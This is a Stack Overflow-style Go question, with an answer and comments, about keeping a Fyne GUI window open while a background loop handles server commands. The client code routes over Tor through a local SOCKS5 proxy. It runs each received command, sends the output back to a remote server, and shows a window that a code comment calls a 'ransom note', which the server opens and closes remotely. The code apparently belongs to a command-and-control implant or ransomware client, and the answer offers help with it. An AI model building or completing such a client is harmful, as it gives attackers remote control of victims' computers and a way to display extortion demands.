# Processing function in background while GUI is shown

Tags: go, fyne

I'm trying to fix this to work correctly I want the client to initConnection() in the background and to receive commands and process them while the message window is shown which the command is "CloseGUI" ..

```
func initConnection() {
    dialer, err := proxy.SOCKS5("tcp", "127.0.0.1:9050", nil, proxy.Direct)
    if err != nil {
        log.Fatal("Failed to connect via SOCKS5 proxy:", err)
    }

    conn, err := dialer.Dial("tcp", "localHost")
    if err != nil {
        log.Fatal("Failed to connect to server:", err)
    }
    defer conn.Close()

    _, err = conn.Write([]byte(fmt.Sprintf("Connected")))
    if err != nil {
        log.Println("Error sending information to server:", err)
        return
    }

    fmt.Println("Connected to server.")

    scanner := bufio.NewScanner(conn)
    for scanner.Scan() {
        command := scanner.Text()
        commandAndParam := strings.Split(command, ",")

        receivedCommand := commandAndParam[0]

        switch receivedCommand {
        case "OpenGUI":
            DrawMessage()
            //The problem is when calling DrawMessage() and the GUI shows the client not processing the command anymore until the GUI is closed which is a problem for me because I want to close the GUI by commands from the server
        case "CloseGUI":
            // Here I want to hide the GUI and set
            MessageAllowed = false
        }
        // Execute the command
        output, err := executeCommand(receivedCommand)
        if err != nil {
            log.Println("Error executing command:", err)
            continue
        }

        // Send the command output to the server
        _, err = conn.Write([]byte(output + "\n"))
        if err != nil {
            log.Println("Error sending output to server:", err)
            break
        }
    }

    if scanner.Err() != nil {
        log.Println("Error reading input:", scanner.Err())
    }

    time.Sleep(100 * time.Millisecond)
}
```

the GUI function code:

```
func DrawMessage() {
    // Create a new Fyne application
    myApp := app.New()
    // Create a new window
    myWindow := myApp.NewWindow("Message From the Server!")

    // Create the ransom note message
    Note := widget.NewLabel("Hello World")
    
    content := container.NewVBox(
        Note,
    )

    // Set the content of the window
    myWindow.SetContent(content)

    // Show the window
    myWindow.ShowAndRun()
}
```

and this is the main function calling secondly I want to check if the MessageAllowed bool shows the Message also I want it to be saved even when the client is closed so when the client reconnects shows again if it is allowed

```
func main() {
    initConnection()
    if src.MessageAllowed == true {
        go DrawMessage()
    }
}
```

so  eventually I want the client to receive the command and process it in the background while the Message is shown and I want to make the client check if the message is allowed from the last session with the server

Answer (score 0, accepted):

Fyne (or any GUI toolkit) cannot run in the background - but your handler can.
Use the “go” keyword in front of `initConnection` instead of `DrawMessage`.

Comment: I tried it but when I run the app it's close by itself

Comment: I guess because you’re assuming the GUI should not be shown unless some bool is set by interacting from the command line? You probably need to “App.Run” irrespective, and the only create the window and show it when your scanner determines that is the right action.